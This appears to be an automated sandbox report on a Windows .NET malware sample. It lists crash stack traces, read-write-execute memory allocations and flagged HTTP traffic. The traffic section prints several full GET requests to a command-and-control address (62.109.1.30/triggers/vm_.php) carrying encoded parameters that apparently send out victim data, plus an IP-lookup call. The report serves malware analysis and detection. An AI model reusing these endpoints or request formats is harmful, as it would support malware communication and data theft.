exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251492 registers.edi: 124251612 registers.eax: 0 registers.ebp: 124251504 registers.edx: 51848040 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c2352a 0x6c23d90 0x6c23a56 0x6c239d1 0x59cd3d1 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247072 registers.edi: 124251612 registers.eax: 0 registers.ebp: 124247084 registers.edx: 51848584 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c23498 0x6c23d90 0x6c23ed6 0x6c23e61 0x59cd425 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124251484 registers.edi: 124251604 registers.eax: 0 registers.ebp: 124251496 registers.edx: 51851444 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1
__exception__ July 30, 2021, 10:28 a.m.	stacktrace: 0x6c2352a 0x6c23d90 0x6c23ed6 0x6c23e61 0x59cd425 mscorlib+0x30c9ff @ 0x7124c9ff mscorlib+0x302367 @ 0x71242367 mscorlib+0x3022a6 @ 0x712422a6 mscorlib+0x302261 @ 0x71242261 mscorlib+0x30ca7c @ 0x7124ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6c23608 registers.esp: 124247064 registers.edi: 124251604 registers.eax: 0 registers.ebp: 124247076 registers.edx: 51851988 registers.ebx: 49440004 registers.esi: 51570296 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A
suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&fc24c3366cf2f1612650240a4476fd9c=0VfiIiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIzU2YkNjZ0UzMkdDM0I2M3ITMwE2MyIjMzEGZmNTNhJmZ0YDZxYzMwIiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&0c2329b9f0dc4c64441b4dcf29994306=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W&fc24c3366cf2f1612650240a4476fd9c=0VfiIiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOisHL9JSUmlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUarxWS2kUaiBXMHplQOhVYpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETpVUVRVEbVRFbodkVp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIkRmYxUzN0kDZhRWZlRzY2UWMyEWZ2IjMmJTYyYGMhJTM1gTOhNmNjJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
suspicious_features	Connection to IP address	suspicious_request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&a0998ff4206b57b19976d7e99c5a37ef=0VfiAjbJpnSXF2c4ZEWzkkaiZHaHRWNCZEWjBneRl2bql0bShVWRp0QMlWVqxEMJl2TpRjMiBnTuNGbaFTY5ljMkxWMXlVeatWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVW5R2VaNnVHZVa3lWSp9maJpnQINmQxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UaRV1U5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJlnW1Z0RURnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVWsJ1MVl2dplUd4x2Yjx2QtVTelBXZ59US2x2RaFjRFlUd5cVYwwWbiBnWXpVRCNUYux2RT92dhdGdUJmbzpGNwJHTp9UaNhlW1lzRhdXOtNmasdFVpdXaJVHesN2YGR1VChXRVRFbFJ1Y4xGTjhnRYNmSp9UaN5mYsZVbjpmTsl0cJlWS2kUejRnRykVaWJjVpd3UPhXRU5kNJNFVCpEbJNXSD1Ud5cVYwYUbjZnQuNmdOVUSshnMZhmSzQVavpWSrpEWZZnStNGbodEZ2FzaJNXSTFld0sWS2k0QiNnRyQGbKhVYHp0QMlWRww0TKl2Tp1EWklHbtRGcS5mYCp0QMlGNyQmd1ITY1ZFbJZTSDVlS1UVUNp0QMl2ZrlFdkVUSyZ1RkZXNtJGcKl2Tp1UMUpkSrl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIzU2YkNjZ0UzMkdDM0I2M3ITMwE2MyIjMzEGZmNTNhJmZ0YDZxYzMwIiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W

Performs some HTTP requests (5 events)

request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&e8f6de43394a8e2ef93b201a0d2ec922=c0280c4c3f572aabfa038560a3f515da&65ab24948c084368808c084126a043f5=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A
request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&fc24c3366cf2f1612650240a4476fd9c=0VfiIiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIzU2YkNjZ0UzMkdDM0I2M3ITMwE2MyIjMzEGZmNTNhJmZ0YDZxYzMwIiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&0c2329b9f0dc4c64441b4dcf29994306=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W&fc24c3366cf2f1612650240a4476fd9c=0VfiIiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOisHL9JSUmlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUarxWS2kUaiBXMHplQOhVYpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETpVUVRVEbVRFbodkVp9maJhkRFZVa3lWSwwWbRdWUq50Z0AzUnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSvJFWkhGZtJGcONzYwFjMMZHbtxkda1mYwJEWhZHOp9keChEZwgWbJZTSTpFdSdVWspkbJNXSDJWM5clWUlzUZBnTYFVavpWSsVjMiZjVXJGcS5WSzlUaORTR610dJl2Tpd3VZBjTzI2dKNETpBjMipmVHJGbSZUSoZVbjZHdFlkMZpnTw0kVRl2bqlkbKNjYpdXaJBzZ65UN0kmT5VERMdXWq5UM0knT6lUaPlWTyI2cKNETplUMTl2bqlUNKhEZ1Z1MipmSDxUa3dFZ2ZlMVl2bqlUd5cVYuZVbjl2dpl0cWNjYs5EbJZTSTVGMsJTWpdXaJdXVU1UdRpXT4RzQPdXSqxUMjRVTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS5lERkpnVHRWavpWSsFzVZ9kSYpleWxWSzlUeRFVMp1UeRFTVGJFbJZTSTpFdG1GVEJEbJNXSD1Ee0kXT1FlaJZTSpNGbax2YsplbjxmTsl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIkRmYxUzN0kDZhRWZlRzY2UWMyEWZ2IjMmJTYyYGMhJTM1gTOhNmNjJiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
request	GET http://62.109.1.30/triggers/vm_.php?OQmUWINaN1N6Ur43rwNkS1171bo7Lv=KuCD7w8UeNyz4A&02a02393cf420479d23438ff09302b99=wkzMmFTNmJmZ3MjNwYGO3kzMyE2Y5EmM0EWN0IzYlZWOkVWZ0QjZwADMyEjM1ETNygzN1UjM&65ab24948c084368808c084126a043f5=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&a0998ff4206b57b19976d7e99c5a37ef=0VfiAjbJpnSXF2c4ZEWzkkaiZHaHRWNCZEWjBneRl2bql0bShVWRp0QMlWVqxEMJl2TpRjMiBnTuNGbaFTY5ljMkxWMXlVeatWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVW5R2VaNnVHZVa3lWSp9maJpnQINmQxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UaRV1U5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJlnW1Z0RURnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ9mUYlVUxcVWsJ1MVl2dplUd4x2Yjx2QtVTelBXZ59US2x2RaFjRFlUd5cVYwwWbiBnWXpVRCNUYux2RT92dhdGdUJmbzpGNwJHTp9UaNhlW1lzRhdXOtNmasdFVpdXaJVHesN2YGR1VChXRVRFbFJ1Y4xGTjhnRYNmSp9UaN5mYsZVbjpmTsl0cJlWS2kUejRnRykVaWJjVpd3UPhXRU5kNJNFVCpEbJNXSD1Ud5cVYwYUbjZnQuNmdOVUSshnMZhmSzQVavpWSrpEWZZnStNGbodEZ2FzaJNXSTFld0sWS2k0QiNnRyQGbKhVYHp0QMlWRww0TKl2Tp1EWklHbtRGcS5mYCp0QMlGNyQmd1ITY1ZFbJZTSDVlS1UVUNp0QMl2ZrlFdkVUSyZ1RkZXNtJGcKl2Tp1UMUpkSrl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dpl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIpUelJiOiEmY4YmY1MmZiFTNhFjZ0IWNxImZwMTZ1kzM0gzNxITNiwiIzU2YkNjZ0UzMkdDM0I2M3ITMwE2MyIjMzEGZmNTNhJmZ0YDZxYzMwIiOigDN5kTNxYTM2EzM0YTNjVmMiR2MjN2YygDO3M2MhNWYiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiYGNlBjNkJGOwkDZjhjZjVjNiVDO3kzM5ETYmBjMkRGOis3W
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 288 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75073000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ac000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7508c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7508a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ad000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75075000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ac000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7508c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75071000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75073000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x748ac000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76083000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75075000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 30, 2021, 10:28 a.m.	process_identifier: 1604 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75074000 process_handle: 0xffffffff	1
